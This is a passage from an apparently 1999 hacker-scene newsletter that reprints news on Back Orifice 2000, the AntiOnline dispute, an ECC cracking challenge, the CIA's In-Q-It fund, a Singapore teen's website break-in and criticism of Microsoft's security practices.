sensitive data from military sites, broken into atomic research centres, and yes, people who have even attempted to sell data to individuals that presented themselves as being foreign terrorists É Many times, I knew about these instances before hand, and could have stopped them." He also claimed to have been secretly working with the U.S. Airforce to develop a "profile of a hacker" for use in fighting "CyberCrime". Mr. Vranesevich's message concluded with a note to the thousands of hackers who read his site: "You yell and scream about freedom of speech, yet you destroy sites which have information that disagree with your opinions.ÊYou yell and scream about privacy, yet you install trojans into others' systems, and read their personal email and files. You truly are hypocrites.ÊAll of these grand manifestos that you develop are little more than excuses that you make up to justify your actions to yourself." Mr. Martin, on the other hand, alleges that many of the reports from AntiOnline, and subsequent follow-on reporting in other media outlets, have been exaggerated and sensationalized. "Not only had AntiOnline driven the media hype behind the stories, they put various government and Department of Defense organizations on full alert preparing for the fallout these attacks would cause," he states on his own Web site. In detailing the relationship between Mr. Vranesevich and the alleged hacker in questions, Mr. Martin notes that "the typical journalist/contact relationship did not exist, and in fact, AntiOnline may have been responsible for creating some of the news to report on É he pays people to break into sites in order to report on it as an exclusive." @HWA 21.0 BO2K, good or evil? The Debate Continues. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by bradcc Bruce Schneier, chief technology officer at Counterpane Internet Security, offers some comments on Back Orifice 2000. Is it an evil 'hacker tool' or remote adminstration software? PC World http://www.pcworld.com/pcwtoday/article/0,1510,13024,00.html How Bad Is Back Orifice? Hacker tool is only as malicious as the hands it falls in--but Windows users beware. by Ann Harrison, Computerworld September 28, 1999, 8:22 a.m. PT Is Back Orifice simply a cool hacking tool or a malicious weapon? Depends on who you ask. Some people think the remote administration tool for Microsoft Windows is not as malicious as it's made out to be. Bruce Schneier, chief technology officer at Counterpane Internet Security, is one of them. Computerworld reporter Ann Harrison spoke with him recently about the free open source tool, which he insists has gotten an undeservedly bad reputation. Q: How does BO2K work? A: There are two parts: a client and a server. The server is installed on the target machine. The client, residing on another machine anywhere on the Internet, can now take control of the server. Perfectly respectable programs, like pcAnywhere or Microsoft's Systems Management Server [SMS], do the same thing. They allow a network administrator to remotely troubleshoot a computer. If the server is installed on a computer without the knowledge or consent of its owner, the client can effectively "own" the victim's PC. Q: Why has BO2K acquired a reputation as only a hacker's tool? A: Back Orifice's difference is primarily marketing spin. Since it was written by hackers, it is evil. That's wrong; pcAnywhere is just as much an evil hacking tool as Back Orifice. Not only can the client perform normal administration functions on the server's computer, but it can also do more subversive things: reboot the computer, turn the microphone or camera on and off, capture passwords. Q: How does BO2K run in stealth mode? A: Unless the server's owner is knowledgeable, and suspicious, he will never know that Back Orifice is running on his computer. Other remote administration tools, even SMS, also have stealth modes. Back Orifice is just better at it. Back Orifice will be used by lots of unethical people to do all sorts of unethical things. Q: Back Orifice can't do anything until the server portion is installed on some victim's computer, right? A: Yes. This means that the victim has to commit a security faux pas before anything else can happen. Not that this is very hard; lots of people network their computers to the Internet without adequate protection. Still, if the victim is sufficiently vigilant, he can never be attacked by Back Orifice. Q: What about Microsoft? A: One of the reasons Back Orifice is so nasty is that Microsoft doesn't design its operating systems to be secure. It never has. You have to make 300-plus security checks and modifications to Windows NT to make it secure. Microsoft refuses to ship the [operating system] in that condition. Malicious remote administration tools are a major security risk. What Back Orifice has done is made mainstream computer users aware of the danger. There are certainly other similar tools in the hacker world, some developed with much more sinister purposes in mind. Microsoft responds to security threats only if they are demonstrated. Explain the threat in an academic paper and Microsoft denies it; release a hacking tool like Back Orifice and suddenly they take the vulnerability seriously. For more enterprise computing news, visit Computerworld Online. Story copyright 1999 Computerworld Inc. All rights reserved. @HWA 22.0 97bit ECC Stronger than 512bit RSA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by no0ne A group of international researchers, using approximately 195 computers from all over the world, after 40 days of computation, has been awarded 1st prize in the latest round of the Certicom ECC Challenge for successfully recovering a 97-bit ECC key. Results bolster Certicom, ANSI X9, and NIST's recommendation that strong security can only be achieved by using a minimum of a 163-bit ECC key. Furthermore, result data proves that the 97-ECC is harder to crack compared to the 512-bit RSA which can still be found on many commercial products today. Computer World http://www.computerworld.com/home/news.nsf/all/9909282ellip (Online News, 09/28/99 12:00 PM) Global team cracks crypto challenge By Stacy Collett An Irish mathematician and his team have cracked the seventh and toughest encryption problem as part of a challenge by Canadian firm Certicom Corp. to prove that one type of encryption is tougher to break than another. The challenge involved 97-bit elliptic curve cryptography vs. 512-bit RSA (Rivest-Sharmir-Adleman), a more common encryption method. The solution was discovered by 195 volunteers in 20 countries after 40 days of calculations on 740 computers, Irish mathematician Robert Harley said in a statement. Solving the problem used approximately 16,000 MIPS-years of computing, twice as much as solving a 512-bit RSA problem, officials said. One MIPSyear is the computing power of one system that can crunch a million instructions per second running for a full year. The team concluded that the elliptic curve encryption was tougher to crack, but debate continues within the security community on the issue. Certicom launched a series of increasingly difficult cryptography problems in November 1997 with prizes worth up to $100,000. Andrew Odlyzko, head of mathematics and cryptography research at AT&T Labs said the test "demonstrates the need to keep increasing cryptographic key sizes to protect against growing threats." @HWA 23.0 DOE Loses Dough to Budget Cut ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Ted An energy appropriations bill passed yesterday by the Senate omits $35 million requested by the Department of Energy for cyber Security. The $35 mil was to be used for real time intrusion detection for 70 Energy Department sites. Members of the Senate said they want management reform first, then they will approve funding. Washington Post http://www.washingtonpost.com/wp-srv/WPcap/1999-09/29/007r-092999-idx.html DOE Loses $35 Million for Cyber Security By Walter Pincus and Vernon Loeb Washington Post Staff Writers Wednesday, September 29, 1999; Page A18 The Senate yesterday passed an energy appropriations bill that omits $35 million requested by Energy Secretary Bill Richardson for increased computer security. The money was eliminated despite months of heated debate over suspected Chinese espionage, during which leading Republicans accused the Clinton administration of foot-dragging on security. Richardson, traveling overseas, issued a statement charging that Congress was withholding "important tools needed to implement security reform" that Congress itself had demanded. Without the $35 million, Richardson said, "it will be impossible to provide real-time cyber intrusion detection and protection for 70 Energy Department sites." The money was eliminated by a House-Senate conference reconciling differences between the initial versions of the bill passed by the two chambers. A member of the conference committee, who requested anonymity, said the $35 million was eliminated because members "want to see management reform" before they approve a huge funding increase. The committee member noted that Richardson is developing a $450 million cyber security proposal for fiscal 2001. It would include money to replace all personal computers used in classified programs with machines that do not have floppy disk drives, and thus cannot easily be downloaded. Congress's action leaves the department with the $2 million it originally sought for computer security before suspected Chinese espionage came to dominate political debate in Washington last spring. Cyber security, in particular, became a major concern after it was discovered that the government's prime espionage suspect at the Los Alamos National Laboratory, Chinese American physicist Wen Ho Lee, had downloaded classified information to his unclassified computer. Lee, who denies passing secrets to China, was fired but has not been charged with any crime. Meanwhile, the Energy Department's director of counterintelligence, Edward J. Curran, acknowledged yesterday that he recommended his brother, a retired police detective, for a $70-an-hour temporary job reviewing counterintelligence operations at the department's three nuclear weapons laboratories. But he said the department's inspector general determined that his recommendation did not violate federal conflict-of-interest statutes. "I recommended my brother, yes, but he does not work directly for me," Curran said. Michael Curran, a veteran of 27 years as a detective for the Waterfront Commission of New York Harbor, has participated in a two-week counterintelligence inspection at Lawrence Livermore Laboratory National Laboratory in California and is now part of a nine-member team reviewing security at the Los Alamos lab in New Mexico. All told, he will work about six weeks this fall, Edward Curran said, and will participate in additional counterintelligence inspections at Energy Department facilities next year. © Copyright 1999 The Washington Post Company @HWA 24.0 California Proposes Email Eavesdropping Law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Simple Nomad Currently most employers can read their employee's email, with very few considering the privacy of their employees. California Governor Gray Davis is considering a bill that would require a company to have a written policy regarding email eavesdropping before the employer can actually read their employee's email. San Francisco Examiner http://199.97.97.16/contWriter/cnd7/1999/09/28/cndin/8639-0375-pat_nytimes.html these guys have some funky shit html so i couldn't (easily) copy it here - Ed @HWA 25.0 Singaporean Boy Sentenced to 12 Months ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by no0ne 12 months probation and 100 hours of community service was the penalty imposed on a 15 year old boy who electronically broke into the internet site of the "Television Corporation of Singapore". The Myanmar citizen is believed to be the first one to appear in a Singaporean court for such an offense. The break-in occurred last June when the boy saw a TV ad showing the TV company's web site address and tried various usernames and passwords in an effort to get into the firm's server. He got in using "news" for both fields. (Someone should punish the admin of the site as well for having such crappy security.) The Straits Times http://straitstimes.asia1.com/cyb/cyb4_0929.html SEP 29 1999 Teen sentenced for hacking into TCS site By KAREN WONG A 15-YEAR-OLD boy was sentenced to 12 months' probation and 100 hours of community service by the Juvenile Court yesterday for hacking into the Television Corporation of Singapore's (TCS) Internet site in June this year. The boy, who cannot be named, is believed to be the first juvenile here to appear in court for such an offence. His case came up on the same day The Straits Times reported that another TCS website had been hacked into early on Monday morning. The culprit in the second hacking has not been caught yet. District Judge Mark Tay Swee Keng stressed that the court took a serious view of such cases. However, in view of the boy's background -- he neither drinks alcohol, smokes nor takes drugs, and also does not keep late hours -- a bond would not be imposed on his parents. His father is a product engineer and his mother is a housewife. Both were in court yesterday. The judge did not impose any curfew on the boy, who goes to a neighbourhood school. He said the parents were already ensuring that he got home by 6 pm. The court heard that TCS had asked the boy to apologise in writing and the apology has been posted on the TCS site. Last month, the boy, a Myanmar national, had pleaded guilty to four counts of unauthorised entry and password disclosure. The court had earlier heard that on June 15 this year, the Secondary 2 boy was watching TV at home when he saw an advertisement showing the address www.mediacity.com.sg He decided to visit the website and then tried various user names and passwords to get into the Mediacity server. He succeeded when he used "news" as the user name and password. He then started exploring the directories and files. Then he told an 18-year-old youth whom he had met chatting on the Internet, that the server had security weaknesses and gave him the password. The older boy, an O-level student in a private school, logged on too. The younger boy then found a file containing all the authorised user names and their corresponding encrypted passwords. He passed them on to the older boy and both used them. The court heard that the younger boy only browsed through the site. The older boy's case is pending. Due to the hacking, TCS, which reported that some of its pages had been replaced by pages containing obscene words, had to shut the server down for about 10 hours. About 80 man-hours went into restoring the site. @HWA 26.0 CIA Funds Startup VC Firm ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond Congress has appropriated $28 million to fund a venture capitol firm with the name of 'In-Q-It'. The firm will use the money to invest in small high-tech companies who are working on promising technological projects that could benefit the CIA. The new corporation will be completely independent of the CIA and will be headed by Gilman Louie, founder of Microprose and ex-executive of Hasboro. Nando Times http://www.techserver.com/noframes/story/0,2294,500039359-500063830-500088357-0,00.html Wired http://www.wired.com/news/news/politics/story/22004.html CIA sets up firm to invest in intelligence technologies Copyright © 1999 Nando Media Copyright © 1999 Associated Press From Time to Time: Nando's in-depth look at the 20th century By TOM RAUM WASHINGTON (September 29, 1999 12:09 p.m. EDT http://www.nandotimes.com) - The CIA, not wanting to miss the boat on the Internet age or be outsmarted by tech-savvy adversaries, is teaming up with Silicon Valley entrepreneurs to invest in companies developing computer technologies that could help with intelligence gathering. Forgoing its usual clandestine ways, the agency has set up its own venture capital firm - with money appropriated by Congress - with offices in Washington and Palo Alto, Calif. It will invest in promising new start-up hi-tech companies. The CIA picked a fanciful name for the new company: In-Q-It. The "In" stands for intelligence. The "It" stands for information technology. And the Q? That's the code name of the James Bond character who comes up with all the gadgets that the fictional British spy uses. "We do have a sense of humor," Central Intelligence Agency spokesman Bill Harlow said Wednesday, confirming the existence of the new company. Harlow said the venture capital company "is clearly tied to us, but they make a big point of being independent." The venture, first reported by The Washington Post and The New York Times in Wednesday's editions, was actually set up last February as a nonprofit organization. But it is just now getting organized, with its own board of directors, according to the new chief executive officer, Gilman Louie. Louie said in an interview that the company would be small, with about 20 to 25 employees, and is being started with $28 million appropriated by Congress last year as part of the classified budget for the agency. Both Louie and the CIA said the venture capital company would only work on unclassified projects. Mainly, In-Q-It will invest in some high-tech companies and form joint ventures with other ones where the companies are working on promising technological projects that could benefit the CIA. This includes ways of helping the CIA to use the Internet more effectively and securely. It also will try to find promising technologies that will help the CIA better use the information it already possesses in a variety of forms, from paper to computer files. He cited the May 7 bombing of the Chinese embassy in Yugoslavia - a target picked by the CIA - as "the manifestation of the worst result that could happen if you don't have all your information lined up." Louie, 39, founded his own electronic game company - MicroProse Inc. - that was later bought by Hasbro. At Hasbro, Louie has been an executive with the toy company's online business group. He said he has no experience in espionage "and I want to keep it that way." The company's board of directors includes John Seely Brown, director of the Xerox Corporation's Palo Alto Research Center; Norm Augustine, chairman of Lockheed Martin; William Perry, the former defense secretary; and Jeong Kim of Lucent. Wired; Valley VCs to CIA: 'Huh?' by James Glave 12:30 p.m. 29.Sep.99.PDT The CIA's new venture capital project isn't going to come up with anything that the free market won't do on its own. That's the opinion of venture capitalists and policy watchers, some of whom lampooned a new effort to develop spy technology in the heart of regulation-wary Silicon Valley. "I am not familiar with what it costs to create those exploding pens," Benchmark Capital general partner Kevin Harvey said. The New York Times reported Wednesday that the new, non-profit VC company, In-Q-It, will be bankrolled with US$28 million appropriated for the spy agency's budget. There is already one office in Washington, with another planned for Northern California. But the tech venture capital community said that the plan is right out of a movie. "That's R and D that is pretty far afield from what we do here," Harvey said, adding that government involvement in venture capital is "not a great idea." In-Q-It CEO Gilman Louie, a veteran of the computer game and toy industry, told the newspaper that the new company is designed to move information technology to the agency more quickly than traditional government procurement processes allow. Neither Louie nor the CIA could be reached for comment. Meanwhile, VCs and policy watchers scoffed at the arrangement. "It looks pretty outrageous when we have healthy capital markets and one of the most innovative technology sectors in the world," Erick Gustafson, technology policy director at the free-market focused Citizens For a Sound Economy, said. "If you have $28 million, do you put it in using the CIA as the manager, or do you use private existing means of research? The existing means of research would prove more efficient," Gustafson said. The CIA's new company aims to cut through the sluggish technology procurement process by directly funding companies that are creating new innovations in the fields of privacy and security. But one VC said that the agency should stick to the current scheme of contracting out for products. "It seems like they would only add layers to [the procurement bureaucracy]," said Gregory Barr of Fleet Equity Partners. "It doesn't seem to make a lot of sense," he said, adding that the arrangements could set up all manner of conflicts of interest between investor and developer. Barr said that Louie, who has already left his position as a Hasbro executive, may not have been the best choice for the job. "If you are looking for a successful VC, I am not sure someone from a toy company is the best person. [Louie] is someone from the product side, not the investment side," he said. Andrew Anker, a partner with August Capital, described the project as interesting but misdirected. "There is a huge glut of money out there," Anker said. "And there are a lot of ideas out there. The question is more, 'What does the marketplace want?'" "Say the CIA said that wrist phones are critical for our agents and we will buy 10,000 of them. As long as there is a consumer market for it, a bunch of entrepreneurs will go down to Sand Hill Road and seek financing to get it." @HWA 27.0 BO2K, NetBus, and now WinWhatWhere ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond So what exactly are the features of a remote admin tool that cause it to be labeled as malicious by AntiVirus vendors? WinWhatWhere, which was actually built to spy on people, avoids this hapless moniker while commercial software such as NetBus and freeware such as BO2K get branded as evil malicious code. What the hell is going on here? ZD Net http://www.zdnet.com/zdnn/stories/comment/0,5859,2343782,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- A bevy of Backdoor bad boys By Kevin Poulsen, ZDTV September 29, 1999 10:29 AM PT URL: http://www.zdnet.com/zdnn/stories/comment/0,5859,2343782,00.html Before flying to DC to cover InfowarCon '99 last month, I took a few minutes to download the dread Back Orifice 2000, and then actually installed the malevolent masterpiece of cyberhorror on my home PC, blatantly ignoring the advice of various security advisories and my antivirus software. As you probably know by now, Back Orifice 2000-- BO2K to its friends -- is an evil program that cyberterrorists can use to take complete control of your computer. They can read your email, wipe out your hard drive, or send your mouse cursor careening around your screen like the planchette on a demon-haunted Ouija board. Villains can send the program as an email attachment to their enemies-- perhaps disguised as an electronic greeting card or a game. If the hapless victim opens the attachment, all is lost. But there's another side to BO2K. If you're a network administrator, the program is well suited for maintaining the computers on your network. If you're the family computer expert, you can send it to your parents and use it to fix whatever minor Windows problems are vexing them this week. If you're leaving town, you can install in on your own machine and use it to check in on your PC: transfer a file that you forgot to bring with you, or capture frames from your Netcam and watch the people burglarizing your apartment. In short, BO2K is actually a useful and free remote administration tool. The program gained its dark image primarily from the showmanship of its creators: the cyberspace bad boys (and gal) known collectively as "The Cult of the Dead Cow." They released BO2K, not in a dry corporate environ, but in a flashy concert-like venue at the DefCon hacker convention. And the rock stars of the underground taunt Microsoft and antivirus companies at every turn. Meanwhile, another "evil" program is struggling to become mainstream. NetBus was created last year by Swedish programmer Carl Fredrik Neikter, and it was originally designed for mischievous fun-- install it on a friend's machine and watch his amazement via his Netcam while you remotely open and close his CD-ROM tray. It became an underground hit even before the original Back Orifice made its high-profile appearance. But Neikter never wanted to be a rebel. Now, partnered with UltraAccess Networks, he's marketing a new version of his program as commercial shareware, and struggling to shake the underground image. Sadly, even charging for the software- a sure sign of legitimacy- hasn't completely removed the cyberpunk taint from NetBus's reputation. Virtually all the major antivirus software makers- some of whom sell their own remote administration tools-- treat the $15 program as a malicious code, a practice UltraAccess founder Judd Spence calls anticompetitive. "Basically," said Spence, "we're probably going to have to take everyone to court." Last March, NetBus scored a prestigious "five cow" rating from TUCOWS, only to be yanked from the software distributor's website a few days later after complaints came in about their distribution of malicious code. Oddly enough, software intended for genuinely evil purposes doesn't seem to be as controversial. Earlier this month, a company called WinWhatWhere released version 2.0 of its Investigator software, a program specifically designed to spy on hapless PC users. It can record every keystroke a user types and, according to the company's press release, includes "an optional Silent Install utility for [sic] discrete deployment." How has Investigator eluded the dire warnings and countermeasures that accompany Back Orifice and NetBus? It is targeted specifically to companies who want to spy on their employees. It seems that's something that just doesn't warrant a security advisory. @HWA 28.0 Microsoft, Insecure or Just More Prevalent? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Elinor With the recent holes found in IE, Hotmail, NT, Office and other Microsoft products many people think that Microsoft just writes insecure code. Microsoft says that their code is no worse than anyone else's but that what they write is looked at by a lot more people. (This article gives a good overview of a lot of the technical hurdles Microsoft faces.) CNN http://www.cnn.com/TECH/computing/9909/28/ms.security.idg/index.html Microsoft: Bad security, or bad press? September 28, 1999 Web posted at: 12:12 p.m. EDT (1612 GMT) by Elinor Mills Abreu From... (IDG) -- Microsoft has been getting a lot of bad press lately over security vulnerabilities in Internet Explorer, Office and Hotmail, among other software. Security concerns with Windows NT even prompted the U.S. Army to move its hacked Web site from NT servers to WebStar servers running the MacOS. But does this mean Microsoft software is less secure than other software? A variety of experts think so, claiming the software giant is offering more functionality at the expense of security. Microsoft defends its strategy, saying users want ease-of-use and more features. And several users said they approve of that strategy. In the end, it's up to users to let the company know whether they are happy with the trade-off or if they want defaults to be set for greater security and more hand-holding. Another option users have is to switch software like the Army did. The Army cited the fact that the MacOS doesn't have support for remote logons or a command shell to provide remote access via a DOS prompt. Scott Culp, security product manager for NT Server, says NT provides tools to disable remote logons and that nearly all Unix systems have a command shell. "Whether or not an operating system has a remote command shell says nothing about its ability to withstand other attacks such as denial of service attacks." Microsoft software experiences the same types of security woes other platforms do but its troubles are more prominent because more people are using Microsoft products than products from other software vendors, Culp says. Without question, Microsoft's dominance in the operating system market plays a big part in the headlines - the sheer number of users of the software makes it an easy and huge target for hackers, increases the chances that security flaws will be discovered and heightens the impact from spreading viruses. Hegemony not the only issue But numerous experts, analysts and hackers say Microsoft's hegemony isn't the only problem. "They certainly don't have a very secure environment. There are so many holes in the Microsoft environment that any [worthy] hacker ... is going to figure out how to break in," says Anne Thomas, a senior analyst at the Patricia Seybold Group in Boston. "It's the dominant operating system out there, so it's going to attract the attention. On the other hand, Windows has extremely sloppy security," says Bruce Schneier, author of Applied Cryptography and a founder and chief technology officer of Counterpane Internet Security, a provider of managed security services in Minneapolis, Minn. What often upsets people is that Microsoft hasn't learned from the mistakes made in older operating systems, notes Jon McCown, technical director of network security at the International Computer Security Association in Reston, Va. Categories of attack that are well understood are cropping up in Windows. "They're doing a forthright job of addressing them, but there's a concern about what we don't know about yet; what's still in the operting system or in the servers that will become an issue." Evolution of Windows It has been suggested that Microsoft's security weakness have to do with the evolution of Windows from a single-user desktop operating system to a multiuser operating system. Windows is desktop software that "was never really intended as network architecture," says Jeff Tarter, editor and publisher of Softletter, based in Watertown, Mass. However, Microsoft is rewriting a lot of the code for Windows 2000, as it did for NT, which should help make it more secure, he adds. Culp acknowledges that the NT security architecture is more "robust" than its predecessors. "NT is an entirely different animal altogether," he says. "It was built from the ground up with a brand new architecture ... to be used as an enterprise class operating system with security as a primary requirement." But Culp also defended the strength of all Windows in general, saying security was "woven" into the operating rather than "bolted on" afterward. Others are skeptical "Microsoft's operating system was never designed with security in mind," Schneier says. "For Microsoft, security is always an afterthought." One example is Microsoft's implementation of file-sharing networking services in Windows 95 and 98, says Tweety Fish, a member of the hacker group Cult of the Dead Cow. Where previous versions of Windows weren't designed for networked computers, Microsoft made TCP/IP file sharing the default on Windows 95 and 98 without explaining the consequences of sharing files over the Internet to users who weren't savvy about network security, he wrote in an e-mail response to questions. Microsoft could have also used a more secure method for file sharing. Trade-off: Security vs. functionality Factors listed by experts interviewed over the past few weeks that lead to security problems for Microsoft include: -- The company's reliance on the Component Object Model specification for running application components on multiple platforms, specifically ActiveX controls, which are reusable component program objects similar to Java applets and which can be attached to an e-mail or downloaded from a Web site. The most dangerous are pre-installed ActiveX controls which contain functions that can be executed on a computer but run without digital signatures used by other ActiveX controls. -- NT's "insecure" default installation, which assumes the user or network administrator will be knowledgeable enough to change the settings to a higher security level. -- The company's use of executable code in data files in Microsoft Office products, primarily macros, which are saved commands that can be recalled with a single command or keystroke. -- The company's tight integration of its applications with its operating system, and lack of tight administration control in the operating system over privileges and access controls, which allow applications and macros to execute other programs. -- The company's use of hidden and/or undocumented APIs or features that can give hackers back doors into Microsoft applications and which don't get the scrutiny of code made public to developers. -- The company's faulty implementation of the Point-to-Point Tunneling Protocol, which enables the extension of corporate networks through private "tunnels" over the Internet. It is still vulnerable to "offline password-guessing attacks from hacker tools such as L0phtcrack," according to Schneier's report at http://www.counterpane.com/pptp.html. In general, the experts agreed that these technologies provide greater ease of use and functionality to users but say they also open the system up to security vulnerabilities. Microsoft counters that many of the features can be either disabled, like macros and ActiveX controls, or made more secure with the use of third-party specialized software. COM opens the door Thomas of the Patricia Seybold Group says Microsoft's main problem has to do with COM, which "opens the system up to all kinds of nasty, dangerous situations." COM's integration with Microsoft Word allowed the prolific Melissa virus to spread so quickly in March, she says. "It's a hard trade-off," Thomas says. "You can do without this incredibly powerful technology that makes your system so much more automatic, or you can shut off that automatic capability and not have that tight integration, but have protection against viruses." Java applets are designed to minimize security violations by being executed in a "sandbox" - a secure area of the computer that isolates Java applets and keeps them from damaging files - whereas ActiveX controls rely on the applet being signed by the creator, whom the user will, ideally, know and trust. Dangers of ActiveX Allowing remote systems to run arbitrary code on a local system is a "massive security risk," hacker Tweety Fish wrote. "It's been proven time and time again that Microsoft's implementation of ActiveX can be broken pretty easily ..." ActiveX controls can be automatically launched when a user goes to an HTML page or clicks on an e-mail attachment. They can be used to do malicious things like run programs on a user's computer, read system files and create files, among other things, according to Richard M. Smith, a security expert and president of Phar Lap Software, a Cambridge, Mass. company that makes real-time operating systems for embedded systems. "I don't think anybody right now, frankly, has a handle on the scope of the [ActiveX] problem," Smith says. " ActiveX really opens up a can of worms." Microsoft has released an average of about two to three security patches a month over the past year, Smith says, adding that he suspects that most Microsoft users have not downloaded them. Within the past year, while Microsoft has had about 10 separate bugs in IE that enable code in messages to read files, Netscape has had one, according to Smith. Default "open" or "closed" Microsoft's Culp argued that COM does not pose a security risk, and countered that Microsoft allows users to configure their software to give them the balance of functionality and security. For instance, users can disable macros and ActiveX controls, and a new security patch for Office lets users decide whether to allow Office documents to launch automatically when they're hosted on Web sites, he says. In addition, a new security configuration tool kit that ships with Windows 2000 will allow users to customize their software to the security level they desire, Culp says. "We don't force anybody into a particular stance," he says. "We provide tools to allow you to make that decision." But several experts say Microsoft should ship its software in the highest security mode rather than a more risky "open" default. "The operating system should be fail safe enough [especially on a server operating system like NT] that a nonadministrator user has to work pretty hard to allow the machine to be compromised," hacker Tweety Fish wrote. "The fact that macros in Microsoft Word can run any DOS executable and access any system function is a massive security hole, and for Microsoft to claim anything else is specious marketing spin." Users can't make knowledgeable choices of what features to disable if they don't fully understand the dangers involved, Tweety Fish says. Instead, they should feel confident that their software is secure and as they start to understand the risks they can modify the security themselves. Eric Schultz, director of Microsoft Content for Security-Focus, which operates a portal site at http://www.securityfocus.com, specifically complained that Windows NT's default installation can allow hackers to get a lot of information, including access to "blank administrator passwords, disabled security policies, and weak permissions over critical system files." But Microsoft can't be expected to make the security decisions for its users, particularly when opting for greater security for some users at the expense of less functionality for others, Culp argues. "There's always a trade-off between convenience and security," he says. "Everybody has a proper point where they balance security against usability. Any two people are going to have a different point that's right for them." Virtually all general-purpose operating systems default to usability over security rather than in a "locked down" mode. Russ Cooper, editor of the NT Bugtraq mailing list (www.securityadvice.com), defended macros. "Although relatively insecure, [macros are] still very much in demand. ... Internet technologies are not designed to be secure. They're designed to be interactive." Cooper says users should be more responsible. "Microsoft is providing us with tools that will help us, but at the same time we as consumers are not taking the responsibility ... to learn basics about using this stuff," he says. But other experts argue that Microsoft has a responsibility to provide greater user safety than it is now, even if it might take more time and money to develop products that are more secure. "In the car industry they have to build with safety in mind. Car makers couldn't get away with this," said Avi Rubin, a principal member of the technical staff at AT&T Labs in Florham Park, N.J., and author of The Web Security Sourcebook. "They're more concerned with the bottom line and profits, and that's upsetting." "Setting the default to dangerous doesn't work in any other industry," Schneier says of Counterpane. Business decision Offering zero-administration capabilities and features that, in their default mode, reduce the level of security in the software, is a strategic decision on Microsoft's part, the experts say. Phar Lap's Smith questioned the need for some of the features Microsoft provides at the expense of security, saying he'd like to turn them off but doesn't always get that option. To simplify things for the administrator, Microsoft is promoting ease-of-use over "robustness of control," hacker Tweety Fish says. However, if the operating system doesn't adequately handle the behind-the-scenes work, security holes can be opened up without the administrator's awareness. "Unix variants have a long way to go to match the ease of use of NT, but on the other hand, with a little bit of knowledge [in Unix], you can know EXACTLY what your machine is doing, which is the most important aspect of server administration," Tweety Fish wrote. Meanwhile, Schultze of Security-Focus predicted that security problems with NT and its predecessors will pale in comparison to security issues that will arise with Windows 2000, which will offer more complexity to secure. "There will be more opportunities for things to go wrong," he says. For instance, Schultze says Windows 2000 defaults to enabling a host of encryption authentication schemes, including LanMan, which he says is easy to decrypt, and users have to go in and disable any schemes they don't want to use. However, the chances that an administrator won't tighten the system down are great. Culp disputes this, noting that in Windows 2000 Microsoft is using security standards like the Kerberos protocol, putting the software to heavy testing including specific attempts to break into it, and has been beta testing it for two years. Tight integration, loose administration, hidden APIs Microsoft prides itself on the tight integration of its applications with its operating system - a matter that sparked an antitrust lawsuit by the U.S. government. But while this integration lets users easily work between the programs, it also makes it easy for flaws in one application to affect the entire system, according to Rubin at AT&T. "There are no security perimeters around any of the applications," he says. "The fact that Word macros can access an Excel database and Excel files can launch other programs with a 'call function'" in Outlook, for example, creates a hacker-friendly environment. Part of the problem is Microsoft's use of so-called hidden APIs, which are kept secret from third-party developers, Rubin says. These allow Microsoft developers to take shortcuts but can also lead to security problems because they aren't scrutinized as public ones are. Hacker Tweety Fish accuses Microsoft of historically implementing "horribly insecure" APIs. "Both Back Orifice and BO2K were built using standard Microsoft APIs; every piece of scary, worrisome functionality is BUILT IN to Microsoft Windows," he wrote. "If these APIs were open to public scrutiny, I doubt such terrible ideas as WNetEnumCachedPasswords [which cheerfully reveals all cached passwords on the system] would exist." Microsoft's Culp couldn't categorically deny that the company uses hidden APIs, but in general he argued that integration is necessary to give advanced products to users. "Microsoft doesn't believe that the way to provide security is to make our applications incompatible with each other," he says. "That's not what our customers want. They want seamless integration." Tightly integrated applications provide productivity improvements and can still be secured, Culp says. For example, Office 2000 macros can be disabled or allowed to run: automatically, only when digitally signed, or only when signed from trusted sources. PR treatment Technical debates aside, most of the critics complained that Microsoft often treats security issues like PR problems that need to be averted and not resolved. The main security problem is "marketing driven product design at Microsoft, and the fact that they will not consider any given security risk a problem until it becomes a problem in the press," hacker Tweety Fish says. He and others complained that Microsoft often denies security problems before being forced to address them with a fix after they are made public, and that the company tries to minimize their scope and put a spin on them. For instance, the company downplayed the Jet/ODBC [open database connectivity] exploit in a Microsoft Security Bulletin over a year ago so that "almost nobody" bothered to install the patch and users were caught off-guard when it made headlines recently, the hacker says. The company downplays the extent of a problem by not mentioning all the situations in which it could arise, saying it is limited to only specific situations and claiming that no customers have been affected, the experts say. For instance, when issuing alerts about browser bugs Microsoft usually doesn't point out that they can occur in e-mail, Smith says. But Smith and some of the others conceded that Microsoft's response time has improved in the past few years. For example, Microsoft released a workaround immediately and a patch four days later for a recent security exploit in Internet Information Server, and "that's probably as responsive as any company would be," McCown says. "A quick fix may break something else," Schultze of Security-Focus says. "They're being thorough. It may not be as quick as some people might like." Smith says he could think of two or three problems Microsoft decided not to fix because of disagreement on their seriousness. For instance, he says it took Microsoft a year to change its mind and admit that it is not secure to have a Word document embedded in an e-mail or a Web page be able to start up the Word application. In addition, Microsoft still maintains that JavaScript executables in e-mail shouldn't be disabled by default. Culp denied the allegations that the company is reluctant to admit exploits or their scope. The company's security response team is quick to address and fix problems, monitors security mailing lists for reports and works closely with security groups, he said. When a vulnerability is confirmed, the company sends e-mail alerts to customers who have asked to be put on a list at secure@microsoft.com and others, and posts information on its security Web site at www.microsoft.com/support and www.microsoft.com/security/services/bulletin.asp, Culp said. Microsoft has more than 200 full-time employees working on nothing but security, he added. "We look into every issue that's reported," he said. "Out of those 10,000 queries and reports (received in the past year) and all the things posted to the mailing lists, etc. there have been about 30 issues that we have needed to provide a patch for this year," and 40 or 45 over the last 12 months, Culp said. Only about 5 percent of the 